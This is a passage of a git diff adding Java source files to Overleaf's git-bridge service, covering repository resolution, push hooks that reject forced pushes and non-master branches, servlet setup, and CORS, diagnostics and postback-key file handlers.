+import org.eclipse.jgit.transport.ServiceMayNotContinueException;
+import org.eclipse.jgit.transport.resolver.RepositoryResolver;
+import org.eclipse.jgit.transport.resolver.ServiceNotAuthorizedException;
+import uk.ac.ic.wlgitbridge.bridge.Bridge;
+import uk.ac.ic.wlgitbridge.data.CannotAcquireLockException;
+import uk.ac.ic.wlgitbridge.git.exception.GitUserException;
+import uk.ac.ic.wlgitbridge.server.Oauth2Filter;
+import uk.ac.ic.wlgitbridge.snapshot.base.ForbiddenException;
+import uk.ac.ic.wlgitbridge.util.Log;
+import uk.ac.ic.wlgitbridge.util.Util;
+
+/*
+ * Created by Winston on 02/11/14.
+ */
+/*
+ * One of the "big three" interfaces created by {@link WLGitServlet} to handle
+ * user Git requests.
+ *
+ * This class is used by all Git requests to resolve a project name to a
+ * JGit {@link Repository}, or fail by throwing an exception.
+ *
+ * It has a single method, {@link #open(HttpServletRequest, String)}, which
+ * calls into the {@link Bridge} to synchronise the project with Overleaf, i.e.
+ * bringing it onto disk and applying commits to it until it is up-to-date with
+ * Overleaf.
+ */
+public class WLRepositoryResolver implements RepositoryResolver<HttpServletRequest> {
+
+  private final Bridge bridge;
+
+  public WLRepositoryResolver(Bridge bridge) {
+    this.bridge = bridge;
+  }
+
+  /*
+   * Calls into the Bridge to resolve a project name to a JGit
+   * {@link Repository}, or throw an exception.
+   *
+   * On success, the repository will have been brought onto disk and updated
+   * to the latest (synced).
+   *
+   * In the case of clones and fetches, upload packs are created from the
+   * returned JGit {@link Repository} by the {@link WLUploadPackFactory}.
+   *
+   * The project lock is acquired for this process so it can't be swapped out.
+   *
+   * However, it can still be swapped out between this and a Git push. The
+   * push would fail due to the project having changed on Overleaf between the
+   * sync and the actual push to Overleaf (performed by the
+   * {@link WLReceivePackFactory} and {@link WriteLatexPutHook}).
+   * In this case, the user will have to try again (which prompts another
+   * update, etc. until this no longer happens).
+   * @param httpServletRequest The HttpServletRequest as required by the
+   *     interface. We injected the oauth2 creds into it with
+   *     {@link Oauth2Filter}, which was set up by the {@link GitBridgeServer}.
+   * @param name The name of the project
+   * @return the JGit {@link Repository}.
+   * @throws RepositoryNotFoundException If the project does not exist
+   * @throws ServiceNotAuthorizedException If the user did not authenticate
+   *     when required to
+   * @throws ServiceMayNotContinueException If any other general user
+   *     exception occurs that must be propagated back to the user, e.g.
+   *     internal errors (IOException, etc.), a file that is too large, and so on.
+   */
+  @Override
+  public Repository open(HttpServletRequest httpServletRequest, String name)
+      throws RepositoryNotFoundException,
+          ServiceNotAuthorizedException,
+          ServiceMayNotContinueException {
+    Log.debug("[{}] Request to open git repo", name);
+    Optional<Credential> oauth2 =
+        Optional.ofNullable(
+            (Credential) httpServletRequest.getAttribute(Oauth2Filter.ATTRIBUTE_KEY));
+    String projName = Util.removeAllSuffixes(name, "/", ".git");
+    try {
+      return bridge.getUpdatedRepo(oauth2, projName).getJGitRepository();
+    } catch (RepositoryNotFoundException e) {
+      Log.warn("Repository not found: " + name);
+      throw e;
+      /*
+      } catch (ServiceNotAuthorizedException e) {
+        cannot occur
+      } catch (ServiceNotEnabledException e) {
+        cannot occur
+      */
+    } catch (ServiceMayNotContinueException e) {
+      /* Such as FailedConnectionException */
+      throw e;
+    } catch (CannotAcquireLockException e) {
+      throw new ServiceMayNotContinueException(e.getMessage());
+    } catch (RuntimeException e) {
+      Log.warn("Runtime exception when trying to open repo: " + projName, e);
+      throw new ServiceMayNotContinueException(e);
+    } catch (ForbiddenException e) {
+      throw new ServiceNotAuthorizedException();
+    } catch (GitUserException e) {
+      throw new ServiceMayNotContinueException(
+          e.getMessage() + "\n" + String.join("\n", e.getDescriptionLines()), e);
+    } catch (IOException e) {
+      Log.warn("IOException when trying to open repo: " + projName, e);
+      throw new ServiceMayNotContinueException("Internal server error.");
+    }
+  }
+}
diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/handler/WLUploadPackFactory.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/handler/WLUploadPackFactory.java
new file mode 100644
index 0000000..646d08c
--- /dev/null
+++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/handler/WLUploadPackFactory.java
@@ -0,0 +1,34 @@
+package uk.ac.ic.wlgitbridge.git.handler;
+
+import javax.servlet.http.HttpServletRequest;
+import org.eclipse.jgit.lib.Repository;
+import org.eclipse.jgit.transport.UploadPack;
+import org.eclipse.jgit.transport.resolver.UploadPackFactory;
+import uk.ac.ic.wlgitbridge.util.Log;
+
+/*
+ * Created by Winston on 02/11/14.
+ */
+/*
+ * One of the "big three" interfaces created by {@link WLGitServlet} to handle
+ * user Git requests.
+ *
+ * The actual class doesn't do much, and most of the work is done when the
+ * project name is being resolved by the {@link WLRepositoryResolver}.
+ */
+public class WLUploadPackFactory implements UploadPackFactory<HttpServletRequest> {
+
+  /*
+   * This does nothing special. Synchronising the project with Overleaf will
+   * have been performed by {@link WLRepositoryResolver}.
+ * @param __ Not used, required by the {@link UploadPackFactory} interface + * @param repository The JGit repository provided by the + * {@link WLRepositoryResolver} + * @return the {@link UploadPack}, used by JGit to serve the request + */ + @Override + public UploadPack create(HttpServletRequest __, Repository repository) { + Log.debug("[{}] Creating upload-pack", repository.getWorkTree().getName()); + return new UploadPack(repository); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/handler/hook/WriteLatexPutHook.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/handler/hook/WriteLatexPutHook.java new file mode 100644 index 0000000..24979f8 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/handler/hook/WriteLatexPutHook.java @@ -0,0 +1,143 @@ +package uk.ac.ic.wlgitbridge.git.handler.hook; + +import com.google.api.client.auth.oauth2.Credential; +import java.io.IOException; +import java.util.Collection; +import java.util.Iterator; +import java.util.Optional; +import org.eclipse.jgit.lib.Repository; +import org.eclipse.jgit.transport.PreReceiveHook; +import org.eclipse.jgit.transport.ReceiveCommand; +import org.eclipse.jgit.transport.ReceiveCommand.Result; +import org.eclipse.jgit.transport.ReceivePack; +import uk.ac.ic.wlgitbridge.bridge.Bridge; +import uk.ac.ic.wlgitbridge.bridge.repo.RepoStore; +import uk.ac.ic.wlgitbridge.data.CannotAcquireLockException; +import uk.ac.ic.wlgitbridge.data.filestore.RawDirectory; +import uk.ac.ic.wlgitbridge.git.exception.GitUserException; +import uk.ac.ic.wlgitbridge.git.handler.hook.exception.ForcedPushException; +import uk.ac.ic.wlgitbridge.git.handler.hook.exception.WrongBranchException; +import uk.ac.ic.wlgitbridge.snapshot.push.exception.InternalErrorException; +import uk.ac.ic.wlgitbridge.snapshot.push.exception.OutOfDateException; +import uk.ac.ic.wlgitbridge.util.Log; + +/* + * Created by Winston on 03/11/14. + */ +/* + * Created by {@link WLReceivePackFactory} to update the {@link Bridge} for a + * user's Git push request, or fail with an error. The hook is able to approve + * or reject a request. + */ +public class WriteLatexPutHook implements PreReceiveHook { + + private final RepoStore repoStore; + + private final Bridge bridge; + private final String hostname; + private final Optional<Credential> oauth2; + + /* + * The constructor to use, which provides the hook with the {@link Bridge}, + * the hostname (used to construct a URL to give to Overleaf to postback), + * and the oauth2 (used to authenticate with the Snapshot API). 
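+   *
+   * The hostname feeds into the postback URL that Overleaf calls once it has
+   * fetched the snapshot files; cf. CandidateSnapshot#getJsonRepresentation,
+   * which produces a URL of the form (illustrative):
+   *
+   *   <postback base>/api/<projectName>/<postbackKey>/postback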
+ * @param repoStore + * @param bridge the {@link Bridge} + * @param hostname the hostname used for postback from the Snapshot API + * @param oauth2 used to authenticate with the snapshot API, or null + */ + public WriteLatexPutHook( + RepoStore repoStore, Bridge bridge, String hostname, Optional<Credential> oauth2) { + this.repoStore = repoStore; + this.bridge = bridge; + this.hostname = hostname; + this.oauth2 = oauth2; + } + + @Override + public void onPreReceive(ReceivePack receivePack, Collection<ReceiveCommand> receiveCommands) { + Log.debug( + "-> Handling {} commands in {}", + receiveCommands.size(), + receivePack.getRepository().getDirectory().getAbsolutePath()); + for (ReceiveCommand receiveCommand : receiveCommands) { + try { + handleReceiveCommand(oauth2, receivePack.getRepository(), receiveCommand); + } catch (IOException e) { + Log.error("IOException on pre receive", e); + receivePack.sendError(e.getMessage()); + receiveCommand.setResult(Result.REJECTED_OTHER_REASON, e.getMessage()); + } catch (OutOfDateException e) { + Log.error("OutOfDateException on pre receive", e); + receiveCommand.setResult(Result.REJECTED_NONFASTFORWARD); + } catch (GitUserException e) { + Log.error("GitUserException on pre receive", e); + handleSnapshotPostException(receivePack, receiveCommand, e); + } catch (CannotAcquireLockException e) { + Log.info("CannotAcquireLockException on pre receive"); + receivePack.sendError(e.getMessage()); + receiveCommand.setResult(Result.REJECTED_OTHER_REASON, e.getMessage()); + } catch (Throwable t) { + Log.error("Throwable on pre receive", t); + handleSnapshotPostException(receivePack, receiveCommand, new InternalErrorException()); + } + } + Log.debug( + "-> Handled {} commands in {}", + receiveCommands.size(), + receivePack.getRepository().getDirectory().getAbsolutePath()); + } + + private void handleSnapshotPostException( + ReceivePack receivePack, ReceiveCommand receiveCommand, GitUserException e) { + String message = e.getMessage(); + receivePack.sendError(message); + StringBuilder msg = new StringBuilder(); + for (Iterator<String> it = e.getDescriptionLines().iterator(); it.hasNext(); ) { + String line = it.next(); + msg.append("hint: "); + msg.append(line); + if (it.hasNext()) { + msg.append('\n'); + } + } + receivePack.sendMessage(""); + receivePack.sendMessage(msg.toString()); + receiveCommand.setResult(Result.REJECTED_OTHER_REASON, message); + } + + private void handleReceiveCommand( + Optional<Credential> oauth2, Repository repository, ReceiveCommand receiveCommand) + throws IOException, GitUserException, CannotAcquireLockException { + checkBranch(receiveCommand); + checkForcedPush(receiveCommand); + bridge.push( + oauth2, + repository.getWorkTree().getName(), + getPushedDirectoryContents(repository, receiveCommand), + getOldDirectoryContents(repository), + hostname); + } + + private void checkBranch(ReceiveCommand receiveCommand) throws WrongBranchException { + if (!receiveCommand.getRefName().equals("refs/heads/master")) { + throw new WrongBranchException(); + } + } + + private void checkForcedPush(ReceiveCommand receiveCommand) throws ForcedPushException { + if (receiveCommand.getType() == ReceiveCommand.Type.UPDATE_NONFASTFORWARD) { + throw new ForcedPushException(); + } + } + + private RawDirectory getPushedDirectoryContents( + Repository repository, ReceiveCommand receiveCommand) throws IOException, GitUserException { + return repoStore.useJGitRepo(repository, receiveCommand.getNewId()).getDirectory(); + } + + private RawDirectory 
getOldDirectoryContents(Repository repository) + throws IOException, GitUserException { + return repoStore.useJGitRepo(repository, repository.resolve("HEAD")).getDirectory(); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/handler/hook/exception/ForcedPushException.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/handler/hook/exception/ForcedPushException.java new file mode 100644 index 0000000..d1d3509 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/handler/hook/exception/ForcedPushException.java @@ -0,0 +1,33 @@ +package uk.ac.ic.wlgitbridge.git.handler.hook.exception; + +import com.google.gson.JsonElement; +import java.util.Arrays; +import java.util.List; +import uk.ac.ic.wlgitbridge.snapshot.push.exception.SnapshotPostException; +import uk.ac.ic.wlgitbridge.util.Util; + +/* + * Created by Winston on 16/11/14. + */ +public class ForcedPushException extends SnapshotPostException { + + private static final String[] DESCRIPTION_LINES = { + "You can't git push --force to a " + Util.getServiceName() + " project.", + "Try to put your changes on top of the current head.", + "If everything else fails, delete and reclone your repository, " + + "make your changes, then push again." + }; + + @Override + public String getMessage() { + return "forced push prohibited"; + } + + @Override + public List<String> getDescriptionLines() { + return Arrays.asList(DESCRIPTION_LINES); + } + + @Override + public void fromJSON(JsonElement json) {} +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/handler/hook/exception/WrongBranchException.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/handler/hook/exception/WrongBranchException.java new file mode 100644 index 0000000..e216781 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/handler/hook/exception/WrongBranchException.java @@ -0,0 +1,29 @@ +package uk.ac.ic.wlgitbridge.git.handler.hook.exception; + +import com.google.gson.JsonElement; +import java.util.Arrays; +import java.util.List; +import uk.ac.ic.wlgitbridge.snapshot.push.exception.SnapshotPostException; + +/* + * Created by Winston on 19/12/14. + */ +public class WrongBranchException extends SnapshotPostException { + + private static final String[] DESCRIPTION_LINES = { + "You can't push any new branches.", "Please use the master branch." + }; + + @Override + public String getMessage() { + return "wrong branch"; + } + + @Override + public List<String> getDescriptionLines() { + return Arrays.asList(DESCRIPTION_LINES); + } + + @Override + public void fromJSON(JsonElement json) {} +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/servlet/WLGitServlet.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/servlet/WLGitServlet.java new file mode 100644 index 0000000..b29ad78 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/servlet/WLGitServlet.java @@ -0,0 +1,46 @@ +package uk.ac.ic.wlgitbridge.git.servlet; + +import javax.servlet.ServletException; +import org.eclipse.jetty.servlet.ServletContextHandler; +import org.eclipse.jgit.http.server.GitServlet; +import uk.ac.ic.wlgitbridge.bridge.Bridge; +import uk.ac.ic.wlgitbridge.bridge.repo.RepoStore; +import uk.ac.ic.wlgitbridge.git.handler.WLReceivePackFactory; +import uk.ac.ic.wlgitbridge.git.handler.WLRepositoryResolver; +import uk.ac.ic.wlgitbridge.git.handler.WLUploadPackFactory; + +/* + * Created by Winston on 02/11/14. 
+ */
+/*
+ * This is the Servlet created by the {@link GitBridgeServer} that does all of
+ * the work in handling user Git requests and directing them to the
+ * {@link Bridge}.
+ *
+ * The {@link GitServlet} does all of the Git work, and these main three
+ * interfaces do all of the Git Bridge work:
+ *
+ * @see WLRepositoryResolver
+ * @see WLReceivePackFactory
+ * @see WLUploadPackFactory
+ */
+public class WLGitServlet extends GitServlet {
+
+  /*
+   * Constructor that sets all of the resolvers and factories for the
+   * {@link GitServlet}.
+   *
+   * Also needs to call init with a config ({@link WLGitServletConfig}), as
+   * required by the {@link GitServlet}.
+   * @param ctxHandler
+   * @param repoStore
+   * @param bridge
+   * @throws ServletException
+   */
+  public WLGitServlet(ServletContextHandler ctxHandler, RepoStore repoStore, Bridge bridge)
+      throws ServletException {
+    setRepositoryResolver(new WLRepositoryResolver(bridge));
+    setReceivePackFactory(new WLReceivePackFactory(repoStore, bridge));
+    setUploadPackFactory(new WLUploadPackFactory());
+    init(new WLGitServletConfig(ctxHandler));
+  }
+}
diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/servlet/WLGitServletConfig.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/servlet/WLGitServletConfig.java
new file mode 100644
index 0000000..022382a
--- /dev/null
+++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/servlet/WLGitServletConfig.java
@@ -0,0 +1,40 @@
+package uk.ac.ic.wlgitbridge.git.servlet;
+
+import java.util.Enumeration;
+import javax.servlet.ServletConfig;
+import javax.servlet.ServletContext;
+import org.eclipse.jetty.servlet.ServletContextHandler;
+
+/*
+ * Created by Winston on 02/11/14.
+ */
+public class WLGitServletConfig implements ServletConfig {
+
+  private static final String SERVLET_NAME = "git-servlet";
+
+  private ServletContext servletContext;
+
+  public WLGitServletConfig(ServletContextHandler ctxHandler) {
+    servletContext = ctxHandler.getServletContext();
+  }
+
+  @Override
+  public String getServletName() {
+    return SERVLET_NAME;
+  }
+
+  @Override
+  public ServletContext getServletContext() {
+    return servletContext;
+  }
+
+  @Override
+  public String getInitParameter(String s) {
+    return null;
+  }
+
+  @Override
+  public Enumeration<String> getInitParameterNames() {
+    return null;
+  }
+}
diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/util/RepositoryObjectTreeWalker.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/util/RepositoryObjectTreeWalker.java
new file mode 100644
index 0000000..bdd9661
--- /dev/null
+++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/util/RepositoryObjectTreeWalker.java
@@ -0,0 +1,83 @@
+package uk.ac.ic.wlgitbridge.git.util;
+
+import java.io.ByteArrayOutputStream;
+import java.io.IOException;
+import java.util.HashMap;
+import java.util.Map;
+import java.util.Optional;
+import org.eclipse.jgit.lib.ObjectId;
+import org.eclipse.jgit.lib.ObjectLoader;
+import org.eclipse.jgit.lib.Repository;
+import org.eclipse.jgit.revwalk.RevWalk;
+import org.eclipse.jgit.treewalk.TreeWalk;
+import uk.ac.ic.wlgitbridge.bridge.util.CastUtil;
+import uk.ac.ic.wlgitbridge.data.filestore.RawDirectory;
+import uk.ac.ic.wlgitbridge.data.filestore.RawFile;
+import uk.ac.ic.wlgitbridge.data.filestore.RepositoryFile;
+import uk.ac.ic.wlgitbridge.git.exception.InvalidGitRepository;
+import uk.ac.ic.wlgitbridge.git.exception.SizeLimitExceededException;
+
+/*
+ * Created by Winston on 16/11/14.
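+ *
+ * Walks the object tree of a commit and materialises it as a RawDirectory,
+ * enforcing an optional per-file size cap. Typical use (a sketch, with the
+ * 50 MiB cap suggested in SizeLimitExceededException):
+ *
+ *   RawDirectory dir =
+ *       new RepositoryObjectTreeWalker(repository, commitId)
+ *           .getDirectoryContents(Optional.of(50L * 1024 * 1024));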
+ */
+public class RepositoryObjectTreeWalker {
+
+  private final TreeWalk treeWalk;
+  private final Repository repository;
+
+  public RepositoryObjectTreeWalker(Repository repository, ObjectId objectId) throws IOException {
+    treeWalk = initTreeWalk(repository, objectId);
+    this.repository = repository;
+  }
+
+  public RepositoryObjectTreeWalker(Repository repository) throws IOException {
+    this(repository, 0);
+  }
+
+  public RepositoryObjectTreeWalker(Repository repository, int fromHead) throws IOException {
+    this(repository, repository.resolve("HEAD~" + fromHead));
+  }
+
+  public RawDirectory getDirectoryContents(Optional<Long> maxFileSize)
+      throws IOException, SizeLimitExceededException, InvalidGitRepository {
+    return new RawDirectory(walkGitObjectTree(maxFileSize));
+  }
+
+  private TreeWalk initTreeWalk(Repository repository, ObjectId objectId) throws IOException {
+    if (objectId == null) {
+      return null;
+    }
+    RevWalk walk = new RevWalk(repository);
+    TreeWalk treeWalk = new TreeWalk(repository);
+    treeWalk.addTree(walk.parseCommit(objectId).getTree());
+    treeWalk.setRecursive(true);
+    return treeWalk;
+  }
+
+  private Map<String, RawFile> walkGitObjectTree(Optional<Long> maxFileSize)
+      throws IOException, SizeLimitExceededException, InvalidGitRepository {
+    Map<String, RawFile> fileContentsTable = new HashMap<>();
+    if (treeWalk == null) {
+      return fileContentsTable;
+    }
+    while (treeWalk.next()) {
+      String path = treeWalk.getPathString();
+
+      ObjectId objectId = treeWalk.getObjectId(0);
+      if (!repository.hasObject(objectId)) {
+        throw new InvalidGitRepository();
+      }
+      ObjectLoader obj = repository.open(objectId);
+      long size = obj.getSize();
+      if (maxFileSize.isPresent() && size > maxFileSize.get()) {
+        throw new SizeLimitExceededException(Optional.ofNullable(path), size, maxFileSize.get());
+      }
+      try (ByteArrayOutputStream o = new ByteArrayOutputStream(CastUtil.assumeInt(size))) {
+        obj.copyTo(o);
+        fileContentsTable.put(path, new RepositoryFile(path, o.toByteArray()));
+      }
+    }
+    return fileContentsTable;
+  }
+}
diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/io/http/ning/NingHttpClient.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/io/http/ning/NingHttpClient.java
new file mode 100644
index 0000000..8d479ee
--- /dev/null
+++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/io/http/ning/NingHttpClient.java
@@ -0,0 +1,67 @@
+package uk.ac.ic.wlgitbridge.io.http.ning;
+
+import io.netty.handler.codec.http.HttpHeaders;
+import java.io.ByteArrayOutputStream;
+import java.io.IOException;
+import java.util.concurrent.ExecutionException;
+import org.asynchttpclient.*;
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
+import uk.ac.ic.wlgitbridge.util.FunctionT;
+
+public class NingHttpClient implements NingHttpClientFacade {
+
+  private static final Logger log = LoggerFactory.getLogger(NingHttpClient.class);
+
+  private final AsyncHttpClient http;
+
+  public NingHttpClient(AsyncHttpClient http) {
+    this.http = http;
+  }
+
+  @Override
+  public <E extends Exception> byte[] get(String url, FunctionT<HttpHeaders, Boolean, E> handler)
+      throws ExecutionException {
+    try {
+      return http.prepareGet(url)
+          .execute(
+              new AsyncCompletionHandler<byte[]>() {
+
+                ByteArrayOutputStream bytes = new ByteArrayOutputStream();
+
+                @Override
+                public State onHeadersReceived(HttpHeaders headers) throws E {
+                  return handler.apply(headers) ?
State.CONTINUE : State.ABORT; + } + + @Override + public State onBodyPartReceived(HttpResponseBodyPart content) throws IOException { + bytes.write(content.getBodyPartBytes()); + return State.CONTINUE; + } + + @Override + public byte[] onCompleted(Response response) throws Exception { + int statusCode = response.getStatusCode(); + if (statusCode >= 400) { + throw new Exception("got status " + statusCode + " fetching " + url); + } + byte[] ret = bytes.toByteArray(); + bytes.close(); + log.debug( + statusCode + + " " + + response.getStatusText() + + " (" + + ret.length + + "B) -> " + + url); + return ret; + } + }) + .get(); + } catch (InterruptedException e) { + throw new RuntimeException(e); + } + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/io/http/ning/NingHttpClientFacade.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/io/http/ning/NingHttpClientFacade.java new file mode 100644 index 0000000..97616c0 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/io/http/ning/NingHttpClientFacade.java @@ -0,0 +1,18 @@ +package uk.ac.ic.wlgitbridge.io.http.ning; + +import io.netty.handler.codec.http.HttpHeaders; +import java.util.concurrent.ExecutionException; +import uk.ac.ic.wlgitbridge.util.FunctionT; + +public interface NingHttpClientFacade { + + /* + * Performs a GET request + * @param url the target URL + * @param handler handler for the response headers. Returning false + * aborts the request. + * @return + */ + <E extends Exception> byte[] get(String url, FunctionT<HttpHeaders, Boolean, E> handler) + throws ExecutionException; +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/BasicAuthCredentials.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/BasicAuthCredentials.java new file mode 100644 index 0000000..15827a8 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/BasicAuthCredentials.java @@ -0,0 +1,20 @@ +package uk.ac.ic.wlgitbridge.server; + +public class BasicAuthCredentials { + + private String username; + private String password; + + public BasicAuthCredentials(String username, String password) { + this.username = username; + this.password = password; + } + + public String getUsername() { + return username; + } + + public String getPassword() { + return password; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/CORSHandler.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/CORSHandler.java new file mode 100644 index 0000000..10d978c --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/CORSHandler.java @@ -0,0 +1,47 @@ +package uk.ac.ic.wlgitbridge.server; + +import java.io.IOException; +import java.util.Set; +import javax.servlet.http.HttpServletRequest; +import javax.servlet.http.HttpServletResponse; +import org.eclipse.jetty.server.Request; +import org.eclipse.jetty.server.handler.AbstractHandler; +import uk.ac.ic.wlgitbridge.util.Log; + +public class CORSHandler extends AbstractHandler { + private final Set<String> allowedCorsOrigins; + + public CORSHandler(String[] allowedCorsOrigins) { + this.allowedCorsOrigins = Set.of(allowedCorsOrigins); + } + + @Override + public void handle( + String target, Request baseRequest, HttpServletRequest request, HttpServletResponse response) + throws IOException { + + String origin = request.getHeader("Origin"); + if (origin == null) { + return; // Not a CORS request + } + + final boolean ok = allowedCorsOrigins.contains(origin); 
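+    // For an allowed origin, the headers below echo the origin back and permit
+    // credentialed requests; a preflight such as (illustrative)
+    //   OPTIONS /<projectId>.git/info/refs   with   Origin: https://www.overleaf.com
+    // then gets a 200, while a preflight from an unknown origin gets a 403.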
+ if (ok) { + response.setHeader("Access-Control-Allow-Origin", origin); + response.setHeader("Access-Control-Allow-Credentials", "true"); + response.setHeader("Access-Control-Allow-Methods", "GET, HEAD, PUT, POST, DELETE"); + response.setHeader("Access-Control-Allow-Headers", "Authorization, Content-Type"); + response.setHeader("Access-Control-Max-Age", "86400"); // cache for 24h + } + String method = baseRequest.getMethod(); + if ("OPTIONS".equals(method)) { + Log.debug("OPTIONS <- {}", target); + baseRequest.setHandled(true); + if (ok) { + response.setStatus(200); + } else { + response.setStatus(403); + } + } + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/DiagnosticsHandler.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/DiagnosticsHandler.java new file mode 100644 index 0000000..064cae7 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/DiagnosticsHandler.java @@ -0,0 +1,59 @@ +package uk.ac.ic.wlgitbridge.server; + +import java.io.IOException; +import java.lang.management.ManagementFactory; +import javax.management.JMException; +import javax.management.ObjectName; +import javax.servlet.ServletException; +import javax.servlet.http.HttpServletRequest; +import javax.servlet.http.HttpServletResponse; +import org.eclipse.jetty.server.Request; +import org.eclipse.jetty.server.handler.AbstractHandler; +import uk.ac.ic.wlgitbridge.util.Log; + +public class DiagnosticsHandler extends AbstractHandler { + + public DiagnosticsHandler() {} + + @Override + public void handle( + String target, Request baseRequest, HttpServletRequest request, HttpServletResponse response) + throws IOException, ServletException { + String method = baseRequest.getMethod(); + if (("GET".equals(method)) && target != null && target.matches("^/diags/?$")) { + baseRequest.setHandled(true); + + Log.debug(method + " <- /diags"); + + String detail; + String summary; + + try { + detail = execute("vmNativeMemory", "detail"); + summary = execute("vmNativeMemory", "summary"); + } catch (JMException e) { + Log.error("Failed to get native memory detail: " + e.getMessage()); + response.setStatus(500); + return; + } + + response.setContentType("text/plain"); + response.setStatus(200); + + response.getWriter().write(summary); + response.getWriter().write("\n----------\n\n"); + response.getWriter().write(detail); + response.getWriter().flush(); + } + } + + public static String execute(String command, String... 
args) throws JMException { + return (String) + ManagementFactory.getPlatformMBeanServer() + .invoke( + new ObjectName("com.sun.management:type=DiagnosticCommand"), + command, + new Object[] {args}, + new String[] {"[Ljava.lang.String;"}); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/FileHandler.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/FileHandler.java new file mode 100644 index 0000000..20a3c94 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/FileHandler.java @@ -0,0 +1,54 @@ +package uk.ac.ic.wlgitbridge.server; + +import java.io.IOException; +import java.util.regex.Matcher; +import java.util.regex.Pattern; +import javax.servlet.ServletException; +import javax.servlet.http.HttpServletRequest; +import javax.servlet.http.HttpServletResponse; +import org.eclipse.jetty.server.Request; +import org.eclipse.jetty.server.handler.ResourceHandler; +import org.slf4j.Logger; +import org.slf4j.LoggerFactory; +import uk.ac.ic.wlgitbridge.bridge.Bridge; +import uk.ac.ic.wlgitbridge.snapshot.push.exception.InvalidPostbackKeyException; + +/* + * Serve files referenced by the snapshot that we send to the Overleaf API. + * + * Requests must include the postback key. + */ +public class FileHandler extends ResourceHandler { + private static final Logger LOG = LoggerFactory.getLogger(FileHandler.class); + + private final Bridge bridge; + private final Pattern DOC_KEY_PATTERN = Pattern.compile("^/(\\w+)/.+$"); + + public FileHandler(Bridge bridge) { + this.bridge = bridge; + } + + @Override + public void handle( + String target, Request baseRequest, HttpServletRequest request, HttpServletResponse response) + throws IOException, ServletException { + if (!"GET".equals(baseRequest.getMethod())) return; + LOG.debug("GET <- {}", baseRequest.getRequestURI()); + + Matcher docKeyMatcher = DOC_KEY_PATTERN.matcher(target); + if (!docKeyMatcher.matches()) return; + String docKey = docKeyMatcher.group(1); + + String apiKey = request.getParameter("key"); + if (apiKey == null) return; + + try { + bridge.checkPostbackKey(docKey, apiKey); + } catch (InvalidPostbackKeyException e) { + LOG.warn("INVALID POST BACK KEY: docKey={} apiKey={}", docKey, apiKey); + return; + } + + super.handle(target, baseRequest, request, response); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/GitBridgeServer.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/GitBridgeServer.java new file mode 100644 index 0000000..57d1b34 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/GitBridgeServer.java @@ -0,0 +1,173 @@ +package uk.ac.ic.wlgitbridge.server; + +import java.io.File; +import java.net.BindException; +import java.nio.file.Paths; +import java.util.EnumSet; +import javax.servlet.DispatcherType; +import javax.servlet.Filter; +import javax.servlet.ServletException; +import org.eclipse.jetty.server.Handler; +import org.eclipse.jetty.server.Server; +import org.eclipse.jetty.server.ServerConnector; +import org.eclipse.jetty.server.handler.*; +import org.eclipse.jetty.servlet.FilterHolder; +import org.eclipse.jetty.servlet.ServletContextHandler; +import org.eclipse.jetty.servlet.ServletHolder; +import uk.ac.ic.wlgitbridge.application.config.Config; +import uk.ac.ic.wlgitbridge.application.jetty.NullLogger; +import uk.ac.ic.wlgitbridge.bridge.Bridge; +import uk.ac.ic.wlgitbridge.bridge.db.DBStore; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SqliteDBStore; +import 
